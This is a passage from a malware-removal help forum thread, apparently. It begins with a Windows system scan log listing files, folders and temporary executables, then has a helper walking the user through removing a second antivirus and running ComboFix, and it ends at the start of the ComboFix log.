2015-06-10 10:17 - 2015-05-08 23:08 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 22:01 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2015-06-10 10:17 - 2015-05-08 22:01 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2015-06-10 10:17 - 2015-05-08 21:59 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 21:59 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 21:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 21:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2015-06-10 10:17 - 2015-04-29 14:22 - 14635008 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2015-06-10 10:17 - 2015-04-29 14:21 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2015-06-10 10:17 - 2015-04-29 14:21 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2015-06-10 10:17 - 2015-04-29 14:21 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2015-06-10 10:17 - 2015-04-29 14:19 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2015-06-10 10:17 - 2015-04-29 14:07 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2015-06-10 10:17 - 2015-04-29 14:07 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2015-06-10 10:17 - 2015-04-29 14:07 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2015-06-10 10:17 - 2015-04-29 14:07 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2015-06-10 10:17 - 2015-04-29 14:05 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2015-06-10 10:17 - 2015-04-24 14:17 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll
2015-06-10 10:17 - 2015-04-24 13:56 - 00530432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comctl32.dll
2015-06-10 10:16 - 2015-06-01 15:16 - 00389840 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-06-10 10:16 - 2015-06-01 14:07 - 00342736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-06-10 10:16 - 2015-05-27 10:35 - 24917504 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-06-10 10:16 - 2015-05-27 10:08 - 19607040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-06-10 10:16 - 2015-05-22 23:28 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-06-10 10:16 - 2015-05-22 23:15 - 00503808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-06-10 10:16 - 2015-05-22 23:15 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-06-10 10:16 - 2015-05-22 23:15 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-06-10 10:16 - 2015-05-22 23:14 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-06-10 10:16 - 2015-05-22 23:13 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-06-10 10:16 - 2015-05-22 23:10 - 02278912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-06-10 10:16 - 2015-05-22 23:09 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-06-10 10:16 - 2015-05-22 23:08 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-06-10 10:16 - 2015-05-22 23:06 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-06-10 10:16 - 2015-05-22 23:05 - 00664064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-06-10 10:16 - 2015-05-22 23:05 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-06-10 10:16 - 2015-05-22 23:04 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-06-10 10:16 - 2015-05-22 22:57 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-06-10 10:16 - 2015-05-22 22:52 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-06-10 10:16 - 2015-05-22 22:49 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-06-10 10:16 - 2015-05-22 22:48 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-06-10 10:16 - 2015-05-22 22:47 - 04305920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-06-10 10:16 - 2015-05-22 22:47 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-06-10 10:16 - 2015-05-22 22:38 - 00689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-06-10 10:16 - 2015-05-22 22:37 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-06-10 10:16 - 2015-05-22 22:37 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-06-10 10:16 - 2015-05-22 22:28 - 12829696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-06-10 10:16 - 2015-05-22 22:20 - 01950720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-06-10 10:16 - 2015-05-22 22:16 - 01309696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-06-10 10:16 - 2015-05-22 22:14 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-06-10 10:16 - 2015-05-22 15:16 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-06-10 10:16 - 2015-05-22 15:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-06-10 10:16 - 2015-05-22 15:01 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-06-10 10:16 - 2015-05-22 15:00 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-06-10 10:16 - 2015-05-22 15:00 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-06-10 10:16 - 2015-05-22 15:00 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-06-10 10:16 - 2015-05-22 15:00 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-06-10 10:16 - 2015-05-22 14:59 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-06-10 10:16 - 2015-05-22 14:53 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-06-10 10:16 - 2015-05-22 14:52 - 06026240 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-06-10 10:16 - 2015-05-22 14:52 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-06-10 10:16 - 2015-05-22 14:48 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-06-10 10:16 - 2015-05-22 14:47 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-06-10 10:16 - 2015-05-22 14:47 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-06-10 10:16 - 2015-05-22 14:47 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-06-10 10:16 - 2015-05-22 14:47 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-06-10 10:16 - 2015-05-22 14:40 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-06-10 10:16 - 2015-05-22 14:36 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-06-10 10:16 - 2015-05-22 14:29 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-06-10 10:16 - 2015-05-22 14:25 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-06-10 10:16 - 2015-05-22 14:24 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-06-10 10:16 - 2015-05-22 14:21 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-06-10 10:16 - 2015-05-22 14:07 - 00720384 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-06-10 10:16 - 2015-05-22 14:06 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-06-10 10:16 - 2015-05-22 14:05 - 02125824 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-06-10 10:16 - 2015-05-22 14:05 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-06-10 10:16 - 2015-05-22 13:57 - 14404096 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-06-10 10:16 - 2015-05-22 13:50 - 02426880 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-06-10 10:16 - 2015-05-22 13:38 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-06-10 10:16 - 2015-05-22 13:26 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-06-09 20:02 - 2015-06-09 21:10 - 00014645 _____ C:\Users\User\Documents\dwayne exercise science summative.odt
2015-06-07 18:47 - 2015-06-22 13:14 - 00000000 ____D C:\Users\User\Desktop\Pics
2015-06-02 14:48 - 2015-06-02 22:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-06-02 14:24 - 2015-06-02 14:24 - 00000000 ____D C:\Users\User\AppData\Local\Avg
2015-06-01 23:15 - 2015-06-01 23:18 - 00000000 ____D C:\Users\User\AppData\Local\Tinder⁺⁺
2015-06-01 23:14 - 2015-06-01 23:18 - 00000000 ____D C:\Program Files (x86)\Tinder++
2015-05-31 18:57 - 2015-05-31 18:57 - 00008185 _____ C:\Users\User\Downloads\Metaxalone.svg
2015-05-30 00:21 - 2015-05-30 00:21 - 00000000 ____D C:\Users\User\Documents\Expression
2015-05-30 00:17 - 2015-05-30 00:17 - 00001102 _____ C:\Users\User\Desktop\Microsoft Expression Encoder 4.lnk
2015-05-30 00:07 - 2015-05-30 00:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Expression
2015-05-30 00:07 - 2015-05-30 00:07 - 00000000 ____D C:\Program Files (x86)\Microsoft Expression
2015-05-30 00:04 - 2015-05-30 00:05 - 25279344 _____ (Microsoft Corporation) C:\Users\User\Downloads\Encoder_en.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-06-28 11:14 - 2011-06-18 04:29 - 01914348 _____ C:\Windows\WindowsUpdate.log
2015-06-28 11:11 - 2014-03-29 19:10 - 00136408 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-06-28 11:11 - 2009-07-14 00:45 - 00023200 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-06-28 11:11 - 2009-07-14 00:45 - 00023200 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-06-28 11:10 - 2015-05-15 07:43 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d08f045e922a21.job
2015-06-28 11:10 - 2013-05-18 23:34 - 00571764 _____ C:\Windows\setupact.log
2015-06-28 11:10 - 2011-06-26 10:35 - 00000000 ____D C:\ProgramData\NVIDIA
2015-06-28 11:10 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-06-28 11:09 - 2013-05-18 23:34 - 01700082 _____ C:\Windows\PFRO.log
2015-06-28 10:48 - 2015-05-15 07:43 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d08f045f011a31.job
2015-06-28 10:34 - 2011-09-26 14:42 - 00000000 ____D C:\Users\User\AppData\Local\CrashDumps
2015-06-28 10:07 - 2011-09-06 17:14 - 00000000 ____D C:\ProgramData\MFAData
2015-06-28 09:58 - 2014-08-14 18:12 - 00000000 ____D C:\ProgramData\Package Cache
2015-06-28 09:31 - 2011-08-11 04:47 - 00000000 ____D C:\Program Files (x86)\Java
2015-06-28 09:16 - 2009-07-13 23:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2015-06-28 08:43 - 2011-12-10 11:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MagicDisc
2015-06-28 08:36 - 2015-04-21 19:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2015-06-28 08:36 - 2014-03-23 22:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-06-28 08:36 - 2013-08-02 17:12 - 00000000 ____D C:\Program Files (x86)\Standard Mouse Driver
2015-06-28 08:36 - 2011-06-23 22:06 - 00000000 ____D C:\Program Files (x86)\Steam
2015-06-28 08:35 - 2009-07-14 01:09 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2015-06-28 08:35 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\rescache
2015-06-28 08:35 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\registration
2015-06-27 23:15 - 2011-06-26 11:06 - 00001417 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-06-27 22:08 - 2011-08-12 20:35 - 00000000 ____D C:\Program Files (x86)\BitComet
2015-06-27 21:27 - 2011-08-28 00:04 - 00000000 ____D C:\Users\User\AppData\Local\Adobe
2015-06-26 20:00 - 2014-06-22 18:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ad-Aware Antivirus
2015-06-26 14:44 - 2014-10-18 20:00 - 00000965 _____ C:\Users\Public\Desktop\AVG 2015.lnk
2015-06-25 15:51 - 2009-07-13 23:20 - 00000000 __RHD C:\Users\Public\Libraries
2015-06-23 10:56 - 2009-07-14 01:13 - 00782578 _____ C:\Windows\system32\PerfStringBackup.INI
2015-06-23 10:50 - 2012-01-02 18:43 - 00000000 ____D C:\ProgramData\AVAST Software
2015-06-22 17:09 - 2013-06-08 23:23 - 00038400 _____ C:\Users\User\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-06-22 17:08 - 2009-07-14 00:57 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-06-22 15:52 - 2014-03-23 22:26 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-06-22 13:20 - 2013-01-17 18:24 - 00000000 ____D C:\Users\User\Desktop\Dwayne Gordon
2015-06-20 08:32 - 2014-07-28 17:33 - 00000000 ____D C:\Users\User\Documents\Letters
2015-06-20 06:30 - 2013-06-08 20:04 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2015-06-20 06:29 - 2011-08-13 00:52 - 00000000 ____D C:\ProgramData\boost_interprocess
2015-06-20 06:29 - 2011-06-26 10:34 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2015-06-18 00:41 - 2011-10-15 22:08 - 00000000 ____D C:\Users\User\AppData\Roaming\Skype
2015-06-11 13:57 - 2014-11-13 05:10 - 00000000 __SHD C:\Users\User\AppData\Local\EmieBrowserModeList
2015-06-11 13:57 - 2014-04-23 02:54 - 00000000 __SHD C:\Users\User\AppData\Local\EmieUserList
2015-06-11 13:57 - 2014-04-23 02:54 - 00000000 __SHD C:\Users\User\AppData\Local\EmieSiteList
2015-06-11 12:17 - 2009-07-14 00:45 - 00293992 _____ C:\Windows\system32\FNTCACHE.DAT
2015-06-11 12:14 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2015-06-11 11:57 - 2013-08-14 03:01 - 00000000 ____D C:\Windows\system32\MRT
2015-06-11 11:48 - 2011-06-26 10:32 - 140135120 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-06-04 17:51 - 2012-12-27 21:06 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-06-04 17:51 - 2012-12-27 21:06 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-06-04 17:47 - 2013-04-25 23:57 - 00000000 ____D C:\Users\User\Downloads\App
2015-06-04 17:47 - 2011-07-27 21:29 - 00000000 ____D C:\ProgramData\Adobe
2015-06-03 17:04 - 2015-02-21 20:21 - 01756424 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll
2015-06-03 17:04 - 2015-02-21 20:21 - 01571696 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll
2015-06-03 17:04 - 2015-02-21 20:21 - 01320304 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll
2015-06-03 17:04 - 2015-02-21 20:21 - 01316000 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll
2015-06-03 11:19 - 2014-03-03 15:31 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-06-02 16:53 - 2015-05-05 16:12 - 00000000 ____D C:\Users\User\Documents\Andrewfleck
2015-06-01 12:55 - 2009-07-14 01:08 - 00032630 _____ C:\Windows\Tasks\SCHEDLGU.TXT

==================== Files in the root of some directories =======

2014-04-18 10:46 - 2014-09-03 18:27 - 0000000 _____ () C:\Program Files (x86)\Mozilla Firefoxwtu-secure-search.xml
2013-12-18 22:38 - 2014-03-29 00:23 - 0000121 _____ () C:\Users\User\AppData\Roaming\WB.CFG
2013-06-08 23:23 - 2015-06-22 17:09 - 0038400 _____ () C:\Users\User\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-05-16 14:24 - 2014-05-16 14:24 - 0607664 _____ (Neople inc) C:\Users\User\AppData\Local\DFOIns.exe
2014-05-16 14:22 - 2014-05-16 14:22 - 0477104 _____ (Neople inc) C:\Users\User\AppData\Local\NeopleCustomURLStarter.exe
2014-04-27 20:53 - 2014-04-27 20:53 - 0000040 _____ () C:\ProgramData\DT0001.dat
2014-04-27 20:52 - 2014-04-27 20:52 - 0000040 _____ () C:\ProgramData\DT0006.dat
2012-05-08 10:29 - 2013-06-20 00:43 - 0002302 _____ () C:\ProgramData\hpzinstall.log
2013-10-13 21:27 - 2013-10-13 21:27 - 0004096 _____ () C:\ProgramData\tbythlfa.ktx
2013-10-13 19:45 - 2013-10-13 19:45 - 0004965 _____ () C:\ProgramData\uxxadbmu.rlu

Files to move or delete:
====================
C:\ProgramData\DT0001.dat
C:\ProgramData\DT0006.dat


Some files in TEMP:
====================
C:\Users\User\AppData\Local\Temp\4e6cf5d72520e51ea54dbf30164d13e3.dll
C:\Users\User\AppData\Local\Temp\air2AFE.exe
C:\Users\User\AppData\Local\Temp\air7286.exe
C:\Users\User\AppData\Local\Temp\airF1B2.exe
C:\Users\User\AppData\Local\Temp\airF2AE.exe
C:\Users\User\AppData\Local\Temp\bdfilters.dll
C:\Users\User\AppData\Local\Temp\D2CB_FirefoxSetup20.0.1.exe
C:\Users\User\AppData\Local\Temp\deb3db606bea0ae4baee84df0b95e3c6.dll
C:\Users\User\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpw_s1g6.dll
C:\Users\User\AppData\Local\Temp\f0c068e16d423ec7a1a7543e1c747bd5.dll
C:\Users\User\AppData\Local\Temp\Gw2.exe
C:\Users\User\AppData\Local\Temp\htmlayout.dll
C:\Users\User\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\User\AppData\Local\Temp\jre-8u45-windows-au.exe
C:\Users\User\AppData\Local\Temp\NGMDll.dll
C:\Users\User\AppData\Local\Temp\NGMResource.dll
C:\Users\User\AppData\Local\Temp\nv3DVStreaming.dll
C:\Users\User\AppData\Local\Temp\nvSCPAPI.dll
C:\Users\User\AppData\Local\Temp\nvSCPAPI64.dll
C:\Users\User\AppData\Local\Temp\nvStereoApiI.dll
C:\Users\User\AppData\Local\Temp\nvStInst.exe
C:\Users\User\AppData\Local\Temp\SfpcHelper_installFinish.exe
C:\Users\User\AppData\Local\Temp\SfpcHelper_installStart.exe
C:\Users\User\AppData\Local\Temp\SkypeSetup.exe
C:\Users\User\AppData\Local\Temp\Tsu6F83DEBF.dll
C:\Users\User\AppData\Local\Temp\unicows.dll
C:\Users\User\AppData\Local\Temp\UNINSTALL.EXE
C:\Users\User\AppData\Local\Temp\update200960.exe
C:\Users\User\AppData\Local\Temp\vcredist_x64.exe
C:\Users\User\AppData\Local\Temp\vlc-2.1.3-win32.exe
C:\Users\User\AppData\Local\Temp\vlc-2.1.5-win32.exe
C:\Users\User\AppData\Local\Temp\vsinit.dll
C:\Users\User\AppData\Local\Temp\vsutil.dll
C:\Users\User\AppData\Local\Temp\zauninst.exe
C:\Users\User\AppData\Local\Temp\_is30C.exe
C:\Users\User\AppData\Local\Temp\_is3919.exe
C:\Users\User\AppData\Local\Temp\_is69D9.exe
C:\Users\User\AppData\Local\Temp\_is6A29.exe
C:\Users\User\AppData\Local\Temp\_is98E4.exe
C:\Users\User\AppData\Local\Temp\_isC41B.exe
C:\Users\User\AppData\Local\Temp\_isCBC7.exe
C:\Users\User\AppData\Local\Temp\_isE919.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-06-24 06:48

 



#5 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:15 AM

Posted 28 June 2015 - 11:05 AM

warning.gif Multiple Anti-Virus Software

I see that you're running more than one antivirus program at the same time.
This is a bad idea.
Using more than one AV will not give you any better protection, but may cause interferences between them, slow your machine or even completely block your OS. You should choose only one to stay, and remove any others. (Malwarebytes Antimalware isn't an Antivirus!) Think carefully and stay with only one AV. It should be done before any other steps in malware removal will be taken.

Please uninstall all but one using the tools you may find in the following link: Uninstallers (removal tools) for common Windows antivirus software.
 
Step 1

Please download combofix.pngCombofix (by sUBs) and save it to your Desktop.

  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan - instructions here.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.

Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)


regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#6 dwayne12

dwayne12
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:12:15 AM

Posted 28 June 2015 - 11:22 AM

the uninstaller is only showing me Malwarebytes Antimalware and my one Av



#7 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:15 AM

Posted 28 June 2015 - 11:25 AM

 and my one Av

 

which one?


regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#8 dwayne12

dwayne12
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:12:15 AM

Posted 28 June 2015 - 11:25 AM

Avg



#9 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:15 AM

Posted 28 June 2015 - 11:30 AM

Please try to uninstall Ad-Aware Antivirus using Revo.


regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#10 dwayne12

dwayne12
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:12:15 AM

Posted 28 June 2015 - 11:32 AM

I was trying to get rid of it for such a long time, and I can not uninstall Ad-Aware with Revo I tried



#11 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:15 AM

Posted 28 June 2015 - 11:40 AM

OK, then uninstall AVG and proceed with the instructions above.


regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#12 dwayne12

dwayne12
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:12:15 AM

Posted 28 June 2015 - 11:43 AM

my Ad-Aware expired and it has not been updated for years I think, I really want to get rid of it



#13 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:15 AM

Posted 28 June 2015 - 11:44 AM

We will remove it manually afterwards.


regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#14 dwayne12

dwayne12
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:12:15 AM

Posted 28 June 2015 - 11:47 AM

k



#15 dwayne12

dwayne12
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:12:15 AM

Posted 28 June 2015 - 06:36 PM

ComboFix 15-06-27.01 - User 06/28/2015  19:07:29.1.4 - x64
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.8191.5605 [GMT -4:00]
Running from: c:\users\User\Downloads\ComboFix.exe
